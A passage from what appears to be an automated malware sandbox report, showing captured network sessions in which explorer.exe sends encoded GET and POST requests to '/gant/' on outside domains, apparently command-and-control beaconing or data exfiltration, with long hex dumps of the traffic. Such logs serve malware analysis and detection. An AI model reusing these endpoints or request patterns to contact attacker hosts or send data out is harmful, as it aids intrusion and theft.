7a dc bd be a8 2d 9b 9d 66 a9 43 3a ce aa 83 e7 b5 f3 ab 56 81 5c e2 1a ad 37 ed ab fa a0 77 de f9 80 bc 8f db d3 e6 d5 a4 d9 b5 06 7e a3 3f c1 7e 33 ee 0d c6 dd ce f5 65 6f 42 47 93 7e 3b be 70 96 88 5c 4d 3b 64 e5 10 c4 83 5b b5 96 35 7f 51 28 3c 1d 0f 67 96 08 5d 1b 8c c6 fd cb 6e b9 31 e9 74 2a fb 80 a2 10 41 f6 8f 4c 79 db 78 84 1a 8f 8a 05 f1 95 ca 44 b2 74 31 43 72 2d a9 8d f0 35 32 40 e1 24 5c 49 59 5a 08 95 b7 35 23 be 51 d4 13 b9 28 c9 01 a2 94 50 ee d7 46 2f 45 cd ee 57 a6 41 11 0a 23 86 e8 ff aa 4c 06 42 51 4f 63 e5 12 9c e0 0e 68 2a a0 ce 14 ee 15 cb e5 3c b8 bb e9 07 a7 27 fb 12 39 ef 0a e6 1a a0 ac ef ca a5 78 d9 55 e8 61 27 30 00 c5 8e 9b f0 93 34 9d ca 48 c8 2d 33 86 91 0b 6d b2 e4 b2 70 25 2f 37 f2 f6 f4 3c d0 77 45 ac dd 24 c0 cc 23 90 19 c0 43 33 e9 4b 52 12 10 de 9c a2 b1 24 23 29 84 d2 71 e2 39 dd f0 d6 e8 19 02 ca ff 9a bf cc 65 0b b1 c8 21 8a 4b 40 cd c0 3c 2a a4 30 b7 15 94 39 1e 67 eb 67 79 08 d2 a4 74 32 95 80 04 49 23 48 85 c1 4b ee 0a ea 64 62 e9 d0 94 d6 19 2a 2d 3e 56 11 15 56 39 0f 07 48 75 91 a0 d6 00 87 99 38 38 08 63 f6 21 e3 b3 b7 22 76 7e 24 7d 4c f9 a0 41 d4 90 88 8b a5 e3 3c 38 39 e5 dc 1e 17 77 f7 41 44 3c 6c 83 42 da 80 24 66 c2 b3 01 6e d1 6d 67 83 cc f8 30 35 cb f0 56 38 4a 65 49 0c 95 42 1b c7 91 01 d2 96 16 e9 c0 bb 3c 6c 64 11 0a c5 c0 ca 84 48 1b ec d1 69 ab d1 6c b7 65 7a f7 38 e7 d9 01 71 09 de 6f db 52 3a 36 5c b2 40 09 a9 89 93 8c 9a cf 3c 2d 1d 7a a6 96 1c 56 a6 98 6b 7c 06 72 55 08 2c 0f 46 51 45 b9 7b ad c4 8c cd f1 d3 47 6c 0c c5 01 72 6b
                                                                                                                  Data Ascii: 446UKD>g~Ehg ;d'R!;d[cVH+nH<$8qAa"_vf<hXA;*W4y<?GgPTM{q(Jz)"0iR1]{A3} pUqA!R*C+gr!mDZu0P?~r7_l~jvrxQEdJX<0RjAEK*S]hbzILE|P>>FEq(7tq_:29F\!up`gbB>)lWgkqX1zy"o`DgQ<;m!92-)Q)R>qHz9Q?7z{B:jyd\'Ojz-fC:V\7w~?~3eoBG~;p\M;d[5Q(<g]n1t*ALyxDt1Cr-52@$\IYZ5#Q(PF/EWA#LBQOch*<'9xUa'04H-3mp%/7<wE$#C3KR$#)q9e!K@<*09ggyt2I#HKdb*->VV9Hu88c!"v~$}LA<89wAD<lB$fnmg05V8JeIB<ldHilez8qoR:6\@<-zVk|rU,FQE{Glrk
                                                                                                                  Feb 13, 2023 19:02:31.003490925 CET1057INData Raw: 73 db 67 4a b5 47 98 39 a5 5a b5 2d da 2e b5 b3 f1 62 eb 4d d6 52 a9 9a 1a 97 09 17 59 55 72 10 6e a3 88 33 ee af ef 5f ff f9 fa e7 9b 37 3f dc fc f2 d9 ef af 3e e5 e1 a5 6f 93 9f a7 14 cd 2a 8a a6 54 37 5f 7f b7 f9 9c 9b fc ca 6d 4d 0d 0a 9f 89
                                                                                                                  Data Ascii: sgJG9Z-.bMRYUrn3_7?>o*T7_mMoSKo0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  42192.168.11.2049888147.92.47.18280C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:02:32.963634968 CET1057OUTGET /gant/?j-Jh9P=gtmxM9sVToXKjMyTASxBPF0sq9AFFQGD43p7DhxGmNljyvBNaufr2S5kOWNcewkSSruZtMGwxAitLcOH1ReRcd40xShNtBsThw==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.cc564966.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:02:33.250881910 CET1059INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 13 Feb 2023 18:02:33 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 2007
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Set-Cookie: SESSION=015e813f-7c1a-454d-87c0-5a9525539440; Path=/; HttpOnly; SameSite=Lax
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 2d e7 bd 91 e5 9d 80 e4 b8 8d e5 ad 98 e5 9c a8 3c 2f 74 69 74 6c 65 3e 0a 09 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 65 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6b 65 79 77 6f 72 64 31 2c 6b 65 79 77 6f 72 64 32 2c 6b 65 79 77 6f 72 64 33 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 69 73 20 6d 79 20 70 61 67 65 22 3e 0a 09 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 2a 7b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 30 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 41 75 64 69 6f 77 69 64 65 27 2c 20 63 75 72 73 69 76 65 2c 20 61 72 69 61 6c 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 6f 41 41 41 41 4b 43 41 59 41 41 41 43 4e 4d 73 2b 39 41 41 41 41 55 45 6c 45 51 56 51 59 56 32 4e 6b 59 47 41 77 42 75 4b 7a 51 41 77 44 49 44 34 49 6f 49 67 78 49 69 6b 41 4d 5a 45 31 6f 52 69 41 72 42 44 64 5a 42 53 4e 4d 49 58 6f 4a 69 46 62 44 5a 59 44 4b 63 53 6d 43 4f 59 69 6d 44 75 4e 53 56 4b 49 7a 52 4e 59 72 55 59 4f 46 75 51 67 77 65 6f 5a 62 49 6f 78 67 6f 65 6f 41 41 63 41 45 63 6b 57 31 31 48 56 54 66 63 41 41 41 41 41 53 55 56 4f 52 4b 35 43 59 49 49 3d 29 20 72 65 70 65 61 74 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 31 32 31 3b 0a 09 09 09 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 09 09 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 3b 0a 09 09 7d 0a 09 09 2e 65 72 72 6f 72 2d 63 6f 64 65 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 43 72 65 65 70 73 74 65 72 27 2c 20 63 75 72 73 69 76 65 2c 20 61 72 69 61 6c 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>404-</title><meta name="robots" content="nofollow"><meta http-equiv="pragma" content="no-cache"><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="expires" content="0"><meta http-equiv="keywords" content="keyword1,keyword2,keyword3"><meta http-equiv="description" content="This is my page"><style>*{margin:0;padding:0;}body{font-family: 'Audiowide', cursive, arial, helvetica, sans-serif;background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKCAYAAACNMs+9AAAAUElEQVQYV2NkYGAwBuKzQAwDID4IoIgxIikAMZE1oRiArBDdZBSNMIXoJiFbDZYDKcSmCOYimDuNSVKIzRNYrUYOFuQgweoZbIoxgoeoAAcAEckW11HVTfcAAAAASUVORK5CYII=) repeat;background-color:#212121;color:white;font-size: 18px;padding-bottom:20px;}.error-code{font-family: 'Creepster', cursive, arial, helvetica, sans-seri
                                                                                                                  Feb 13, 2023 19:02:33.251013994 CET1060INData Raw: 66 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 30 70 78 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 39 38 29 3b 0a 09 09 09 77
                                                                                                                  Data Ascii: f;font-size: 200px;color: white;color: rgba(255, 255, 255, 0.98);width: 50%;text-align: right;margin-top: 5%;text-shadow: 5px 5px hsl(0, 0%, 25%);float: left;}.not-found{width: 47%;float: right;


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  43192.168.11.2049889173.255.194.13480C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:02:38.662332058 CET1061OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.thejointcomission.org
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.thejointcomission.org
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.thejointcomission.org/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 42 53 46 44 41 4d 33 67 32 66 51 57 33 4e 7a 59 66 77 35 58 28 39 49 66 6d 32 58 5f 37 48 35 48 56 62 28 57 35 6a 36 68 4e 77 34 5a 6a 73 75 71 6e 48 72 45 31 69 57 78 43 48 57 58 43 56 32 33 79 72 67 6f 56 53 6a 47 6a 32 36 58 38 48 35 67 37 70 54 51 6e 48 51 55 7e 72 4e 74 45 34 32 74 47 67 53 72 62 35 79 33 59 42 43 57 55 69 46 31 47 48 73 49 78 5a 35 52 46 4e 62 56 4e 41 50 71 4d 39 61 4d 7e 71 33 63 61 6c 7e 57 4e 30 6b 6f 58 73 4e 57 6c 53 64 73 6c 32 31 44 68 55 76 6d 76 50 47 58 4c 78 77 61 79 67 54 72 66 52 56 49 6f 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=BSFDAM3g2fQW3NzYfw5X(9Ifm2X_7H5HVb(W5j6hNw4ZjsuqnHrE1iWxCHWXCV23yrgoVSjGj26X8H5g7pTQnHQU~rNtE42tGgSrb5y3YBCWUiF1GHsIxZ5RFNbVNAPqM9aM~q3cal~WN0koXsNWlSdsl21DhUvmvPGXLxwaygTrfRVIoQ).
                                                                                                                  Feb 13, 2023 19:02:38.804670095 CET1062INHTTP/1.1 200 OK
                                                                                                                  server: openresty/1.13.6.1
                                                                                                                  date: Mon, 13 Feb 2023 18:02:38 GMT
                                                                                                                  content-type: text/html
                                                                                                                  transfer-encoding: chunked
                                                                                                                  content-encoding: gzip
                                                                                                                  connection: close
                                                                                                                  Data Raw: 33 41 45 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bd bd 7d 5b db 48 b2 ff fd ff 79 15 46 d7 5c ac bd 11 0a 90 67 13 87 43 c0 49 98 4d 20 03 64 32 b3 2c 37 23 6c 01 4a 8c c4 c8 32 84 21 7e ef bf 4f 55 77 4b 6d 63 42 b2 67 ef 9d 6b 37 c8 52 ab d5 0f d5 d5 f5 f0 ad ea e7 73 1b db eb 7b bf bf ef 36 4e cb b3 c1 8b ff 79 2e 7f 1a 83 38 3b e9 04 49 16 bc f8 9f 06 ff 3d 3f 4d e2 be b9 d4 9f 67 49 19 37 7a a7 71 31 4c ca 4e f0 61 ef d5 c2 53 5b b2 7e 7c 5a 96 e7 0b c9 9f a3 f4 a2 13 7c 59 18 c5 0b bd fc ec 3c 2e d3 a3 41 12 34 7a 79 56 26 19 ef 6e 76 3b 49 ff 24 09 5e 3c 1f f6 8a f4 bc 6c 94 57 e7 49 27 28 93 2f e5 fd 4f f1 45 6c ee 06 2f 9a 97 69 d6 cf 2f a3 ad 9d ee 87 77 5f bf 36 f5 6f e7 7a dc 6a 45 69 96 96 9d eb f3 22 bd 88 7b 57 ed eb 5e 9e 7f 4e 93 e1 61 92 c5 7c aa df 3e 8e 07 c3 64 1c c6 9f e2 2f ed eb 7e 92 5d 1d 0e d2 61 d9 de 0f 8e e2 b3 28 2b 16 fa 71 19 47 59 52 06 07 e3 f1 ca 37 3e 33 c8 e3 7e 52 1c d2 f2 e3 f4 a4 73 fd e5 3c ed b7 83 0f 97 bf bf fa f0 ea d7 8f af 2f d7 5e 7e f8 b5 bf b7 71 d2 7b 1f 84 83 b4 97 64 c3 e4 1f c9 55 3b 58 ec 3f 78 fa e8 28 7e 1a 2f 06 61 7c 7e ce 23 c6 20 cf 36 37 da c1 83 a5 47 8f 97 9e 3d 7e 1a 8c 57 56 9a cd 56 e7 c5 f5 45 5c 34 92 b0 0c 8b ce f5 b3 c5 27 4b ed a6 fe 90 27 c1 68 98 34 86 65 91 f6 ca 60 a5 88 fa cd 32 bc de 6c cb 4b d9 b8 b5 22 ef 65 9d c5 30 ed 64 f1 45 7a 12 97 79 11 f1 42 b1 76 c2 20 47 67 71 d9 3b 6d de 7f 95 16 c9 71 fe 65 ff 5f f7 ff 35 3c 68 fe ab 7f ef 5f 11 ff b4 ee b7 56 d2 f9 f9 66 d6 b9 97 ee 2f 1d b4 c6 e1 e3 67 8b 8b b7 7d 79 90 94 8d 6c 25 3d 6e da 26 bc d1 26 a4 e3 56 58 34 97 1f 3c 79 c8 6c 0c 5a 4c 41 36 2c 1b 49 a7 9f f7 46 67 d2 82 5e 91 c4 65 d2 1d 24 f2 ab 19 f4 d3 8b a0 b5 92 30 73 59 52 bc d9 7b f7 b6 13 fc eb cb 83 de dc c2 c2 7e 7a dc 18 94 49 63 b3 db 78 7c f0 e2 39 05 5f 3c bf af ff ce ed 27 59 3f 3d 3e 58 58 a0 68 72 b3 f8 93 1f 2b fe f4 c7 8a 3f fb 56 f1 20 cc 3a 49 74 92 94 b6 83 c3 97 57 7b f1 c9 56 7c 96 d8 ae 46 83 24 3b 29 4f c7 32 4d e9 4a da 79 d8 e9 74 b2 d5 c7 ed 07 fa f7 49 7b 59 ff 3e 6d 2f e9 df 67 ed 45 26 e1 d1 e3 e5 db 26 c1 8e fd fb 43 1d fc f3 f0 5d a9 17 17 e1 fa 23 bd e8 87 1b 6f f5 e2 2a dc 7e af 17 6f c3 c1 2b bd f8 2b fc 7d a4 17 dd 70 e3 44 2f 4e c2 f5 df f4 e2 38 7c dd d5 8b cb 70 f8 41 2f de 54 94 75 3d 86 e6 8a 66 c6 34 43 7a 59 78 1d 0b 61 69 a1 b5 50 c9 4b af 37 c2 8b a4 18 42 dd fa 6b cf be 9e 76 8a e6 e3 27 cf 9e b4 c2 9c ab 67 8b cf 5a 61 cc c5 d3 c7 4b 8b ad 95 de 20 1e 0e 1b 43 43 32 c5 a8 07 e5 0a d1 b7 ae cb e2 ea 1a 3a 9b 4b be 7e 0d f2 a3 4f 09 74 3f d7 11 e6 90 1f 37 92 56 91 94 a3 22 6b 2e 86 71 f4 cf 56 33 d8 4a 2e 1b b0 a2 32 cd 4e 1a 71 63 5d 97 e8 a8 90 f5 df 28 84 05 15 c9 b0 11 67 0d 53 4f 23 1e 36 d2 ec 7c 54 42 83 f2 85 72 c6 17 ca e9 2f ec de 55 7b e3 2c ef 27 83 46 99 4b 43 1a 69 29 df 48 cb 34 1e 34 ce 8b fc 3c 29 4a 78 12 1f dc d6 ae 44 74 3a 3d c9 9a e5 69 3a a4 b3 a1 bd cb 98 16 14 6b 26 ad e8 38 2f ba 31 ab b6 99 b0 f8 59 75 fb 30 85 83 4e b2 62 96 56 d6 a1 eb 79 f4 67 ab 59 b6 56 32 4b 5e f3 f3 c5 fc bc 1b ab 8e 1b 2b ee 65 93 b5 25 b4 ac c1 ed a6 1b be 3f 82 9f ae 93 71 d0 48 19 24 69 6d c9 60 27 fd 46 5c d2 9a a3 11 ab 31 ce fa 8d 1e e3 97 e5 65 e3 28 11 c6 9f 9d 50 80 6a 8e 59 d7 a3 22 69 fc 74 5d 8e a3 46 63 b3 6c 5c a6 83 41 e3 34 be 48 28 dd 48 8e 8f a9 2b fa a3 15 32 36 09 35 15 fb 09 2c a6 d5 0a a5 e7 fb e5 41 a7
                                                                                                                  Data Ascii: 3AEC}[HyF\gCIM d2,7#lJ2!~OUwKmcBgk7Rs{6Ny.8;I=?MgI7zq1LNaS[~|Z|Y<.A4zyV&nv;I$^<lWI'(/OEl/i/w_6ozjEi"{W^Na|>d/~]a(+qGYR7>3~Rs</^~q{dU;X?x(~/a|~# 67G=~WVVE\4'K'h4e`2lK"e0dEzyBv Ggq;mqe_5<h_Vf/g}yl%=n&&VX4<ylZLA6,IFg^e$0sYR{~zIcx|9_<'Y?=>XXhr+?V :ItW{V|F$;)O2MJytI{Y>m/gE&&C]#o*~o++}pD/N8|pA/Tu=f4CzYxaiPK7Bkv'gZaK CC2:K~Ot?7V"k.qV3J.2Nqc](gSO#6|TBr/U{,'FKCi)H44<)JxDt:=i:k&8/1Yu0NbVygYV2K^+e%?qH$im`'F\1e(PjY"it]Fcl\A4H(H+265,A
                                                                                                                  Feb 13, 2023 19:02:38.804801941 CET1064INData Raw: e0 c7 18 96 48 57 93 d6 b5 6b 51 b0 96 35 92 a2 c8 8b 46 de eb 51 7f bf 71 79 9a 32 99 b3 e7 38 08 93 d6 78 3c 36 43 d3 eb 5c 1f 25 31 d7 ed 34 ea 25 91 b9 0e b5 b2 97 de 7d ef 86 cf ae 2f f2 b4 df 80 aa 26 18 b5 bd 39 8c db f6 ea cf 51 32 4a f6
                                                                                                                  Data Ascii: HWkQ5FQqy28x<6C\%14%}/&9Q2J]%]^>bGzw?ckn"q|ck`u^qOaBm~C]+L62Zi_62UW1iv54tJ2FZiR5Mfq%?Z+fa7
                                                                                                                  Feb 13, 2023 19:02:38.804903030 CET1065INData Raw: 95 1d 51 3c ec 32 9b 9b 2b a3 7a 2b a3 51 fc f6 74 35 73 c3 53 b7 36 37 a6 57 cd dc d2 78 4c 7d e3 71 f8 74 79 f9 f1 1d 36 94 3f d5 52 21 26 34 d3 96 ac 13 2c 2d 2f 3f 88 de ef 6c 6f 04 e3 f0 d9 a3 47 4f ee a8 e1 52 6b c8 2b 53 49 65 d8 d0 be a5
                                                                                                                  Data Ascii: Q<2+z+Qt5sS67WxL}qty6?R!&4,-/?loGORk+SIelOW=VzT6iwdjBf.vCTn+/3DL1KXjL$jP_LLPw#V,?cI{tE2WbzS-?X~c8X{s
                                                                                                                  Feb 13, 2023 19:02:38.804996967 CET1066INData Raw: 5a e9 62 6b 25 67 47 eb c4 4a 9f 29 3b af db 77 27 a4 a2 dc b6 97 95 13 37 f3 af 5f b3 a8 4b db b5 0f de 74 c7 13 bd 62 ae f2 4e 35 8f a8 c2 dc 48 3a bc 69 d6 42 dc 29 f7 73 66 96 7f be 7e c5 63 d1 8c d9 73 d8 c6 0b 25 b5 96 5d 13 49 88 71 40 c4
                                                                                                                  Data Ascii: Zbk%gGJ);w'7_KtbN5H:iB)sf~cs%]Iq@G#_F~! Z*+&XAYx0\D$-a=?h<aXw/;qEm_==7|dK,n3ED-'fn7z*4yd`E
                                                                                                                  Feb 13, 2023 19:02:38.805069923 CET1068INData Raw: 6e 48 d6 e3 7f 42 b5 49 e7 65 9e e3 44 61 ab 3d a6 98 8e 85 72 88 c1 47 38 c4 6a e4 e8 18 36 6f 6b 00 9b 2a ad 8c 86 a3 73 e9 73 7c 94 e2 f6 bf 7a a7 b8 95 5d 7c 26 62 04 70 fd 07 5a 7c 5b 31 2c c1 74 50 70 8e b7 2d 6a d7 d2 86 d8 09 ad a5 93 a6
                                                                                                                  Data Ascii: nHBIeDa=rG8j6ok*ss|z]|&bpZ|[1,tPp-j'"dc$-r@c#AE7[?mMfXti`3)Hx2/Kv@^=OCK%%yu%s$KxeHy7q9\
                                                                                                                  Feb 13, 2023 19:02:38.805164099 CET1069INData Raw: a4 7f ac 41 18 0b b6 39 34 79 0d 37 4a ff 4a fa 6b 02 39 1a aa c1 63 d8 c9 ad ed c3 0d 85 27 40 c3 74 2d 2b 65 70 86 13 35 80 11 3a c3 58 25 c4 ac 36 95 10 33 40 d2 16 55 5d ec 82 22 31 4f 14 d7 0f 76 ae a3 28 ca 43 be d7 96 ab 61 88 6d a4 5d b2
                                                                                                                  Data Ascii: A94y7JJk9c'@t-+ep5:X%63@U]"1Ov(Cam]=(:4b_9+31%P7L%1LOHh;?cOHti"u(a[=:y]:C=de=*(cHU6_806Daf78Ml*Z|2
                                                                                                                  Feb 13, 2023 19:02:38.805241108 CET1070INData Raw: 8a 14 20 2e 82 b2 b5 55 55 96 08 17 3c 67 7c 7f d8 ce 3c 97 1f c9 72 f0 f4 19 07 bb c1 f5 0a c0 53 a9 c6 0b 69 ea 34 01 3e aa 77 12 eb a7 79 1a 31 27 2e 1f 40 d0 02 54 2e a3 22 a4 e9 37 4e 3b 6d 46 09 be ec ba 3b 41 92 53 ed 37 0a 99 66 a2 88 23
                                                                                                                  Data Ascii: .UU<g|<rSi4>wy1'.@T."7N;mF;AS7f#aUuk&!K09B8oir"JBi%q1smj.j*b1%cJGej9?0:j#.n?I*PPb!("<jK'LWY!a8@2W:
                                                                                                                  Feb 13, 2023 19:02:38.805330992 CET1072INData Raw: 59 c8 5f c2 f0 a3 fb 6e 38 26 0a 3d 5e 5a 5a d6 52 fc d5 52 76 08 27 0a 61 0a 78 a4 85 f8 ab 85 3c 6a 98 28 f8 f8 e9 d2 13 2d c8 df ba 60 4d 1a 13 85 1f 3e 5d 7e 60 0a 2f 13 f4 49 03 b5 56 8f 4c 26 4a 3f 7d f2 d4 b4 81 bf 5a 7a 82 68 26 8a 2e 3d
                                                                                                                  Data Ascii: Y_n8&=^ZZRRv'ax<j(-`M>]~`/IVL&J?}Zzh&.=X4)zOxS'OYy:\d4O>: .PINiF0L!% |/hT#yONwb;|ak0;'T)[@5j@P?5nEsNlvFw
                                                                                                                  Feb 13, 2023 19:02:38.805402994 CET1073INData Raw: df 36 b7 ac ad 0c 41 05 6f 9d b2 3b 8d 1c 32 74 3e 91 e0 9c 65 dc b4 64 86 73 d2 20 22 d8 ab 52 93 c0 c3 ea e4 85 83 3c 57 ae a0 0d 0f 91 42 44 85 0b e8 52 21 c7 0a 55 5e c6 13 21 d0 4c 98 af d3 2b 65 fb 77 fa d9 9c 64 7c 40 f1 2d 23 41 b8 16 e1
                                                                                                                  Data Ascii: 6Ao;2t>eds "R<WBDR!U^!L+ewd|@-#A6MRHaz9@+AK,q1$gkZ}`W1;D9Xa/Gx]%<GpSbZ2IFkrEf%@o1n&_P.%!s)c|'m[+OeUk$
                                                                                                                  Feb 13, 2023 19:02:38.805500984 CET1074INData Raw: 42 59 46 52 53 0f 1b 69 93 fe 7d 8a 85 11 19 a2 15 31 78 8b 9e a7 48 ea 06 d1 21 b4 6b c0 ea b2 3c c5 0e fd 46 e1 ea 62 d8 10 a2 d8 c4 b6 8a 76 a4 b4 e0 25 c4 70 b8 6e f3 60 d0 3b 9f 81 f9 36 cf 7a 83 e1 ad cf 8e d3 1d f5 8e 1b 60 64 30 a3 5c c0
                                                                                                                  Data Ascii: BYFRSi}1xH!k<Fbv%pn`;6z`d0\ qQ4E+MfN#tx\x&4<uNARZARw4vni@VRKx[0{]60S.Oc,9T+c30=iA"
                                                                                                                  Feb 13, 2023 19:02:38.942116976 CET1076INData Raw: 25 51 eb cd 47 d8 91 c9 68 f3 9b 5c 91 37 a7 15 fe 93 2b 39 aa c4 05 f3 ff 52 e5 79 da d3 ac 8c 06 06 da 0a 7f 9f ba 6f 4e c2 70 4f ff 31 f5 b4 da a7 57 c1 22 14 17 c4 0e d9 92 aa 5c ff 1c 72 78 42 99 28 4b 2a c4 c5 26 41 c0 4e 41 cf 92 5b 34 74
                                                                                                                  Data Ascii: %QGh\7+9RyoNpO1W"\rxB(K*&ANA[4t58(X,JD,`hfifi%f'{,T6r4`V=(Qzxk6H>6K!s;0nZmO67F+}734MCt1+.+


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  44192.168.11.2049890173.255.194.13480C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:02:41.316309929 CET1085OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.thejointcomission.org
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.thejointcomission.org
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.thejointcomission.org/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 42 53 46 44 41 4d 33 67 32 66 51 57 34 4e 76 59 64 58 74 58 75 74 49 59 6a 32 58 5f 77 6e 35 44 56 62 37 57 35 69 28 38 4f 47 6f 5a 6a 4e 65 71 6d 43 48 45 38 79 57 78 4a 6e 57 53 4d 31 32 47 79 71 63 65 56 53 76 47 6a 32 7e 58 39 32 5a 67 79 35 54 58 6f 58 51 62 75 37 4e 75 4f 59 32 37 47 67 65 4e 62 39 36 33 59 79 32 57 56 67 39 31 58 6a 59 4c 6e 4a 35 58 48 4e 62 57 44 67 50 4e 4d 39 57 69 7e 71 7e 6e 61 32 69 57 4e 56 45 6f 5a 4d 4e 56 28 53 64 76 34 6d 30 32 6f 52 32 4e 6e 39 71 55 51 43 55 69 31 7a 57 6f 63 79 42 45 79 2d 31 4e 49 6c 62 51 57 44 42 6c 39 52 7a 31 41 31 77 65 47 39 73 7a 77 32 6e 2d 50 4c 74 61 38 44 66 63 4a 4c 52 58 44 74 43 52 48 6b 4a 70 46 37 6e 39 57 4e 74 64 36 32 75 35 35 48 30 70 53 7a 74 38 6c 70 69 33 54 43 33 76 52 49 4a 4d 49 67 4b 2d 57 78 4d 49 65 42 4e 59 54 74 43 4a 66 2d 6f 4d 34 76 57 44 44 42 6d 32 6b 77 4e 50 4d 72 42 30 32 69 4c 57 28 45 71 4c 75 35 7a 7a 52 53 6e 5a 75 64 78 75 79 41 70 5a 6d 31 4f 69 50 58 76 63 55 6c 61 36 48 69 6b 36 56 56 4e 71 66 51 37 6a 4d 31 54 6e 63 73 55 56 55 75 50 52 4f 46 38 5a 28 76 73 67 6e 2d 72 55 51 5a 5a 66 6f 74 45 52 65 36 56 54 76 33 5a 78 5a 6c 4f 59 37 34 59 66 6b 6d 6e 38 46 76 43 72 48 71 4f 63 73 68 41 77 34 44 4d 76 32 